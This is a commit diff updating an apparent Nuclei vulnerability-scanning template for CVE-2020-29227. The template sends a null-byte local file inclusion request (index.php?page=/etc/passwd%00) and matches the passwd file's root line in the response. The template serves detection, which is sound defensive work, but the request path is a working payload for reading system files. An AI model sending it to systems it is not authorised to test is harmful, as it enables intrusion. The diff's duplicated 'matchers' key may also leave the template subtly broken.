Update CVE-2020-29227.yaml

patch-1
Prince Chaddha 2021-07-24 12:16:30 +05:30 committed by GitHub
parent f40aca136b
commit 956eb6691f
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 5 additions and 1 deletions

View File

@ -14,9 +14,13 @@ requests:
- method: GET
path:
- "{{BaseURL}}/index.php?page=/etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
part: body
matchers:
- type: status
status:
- 200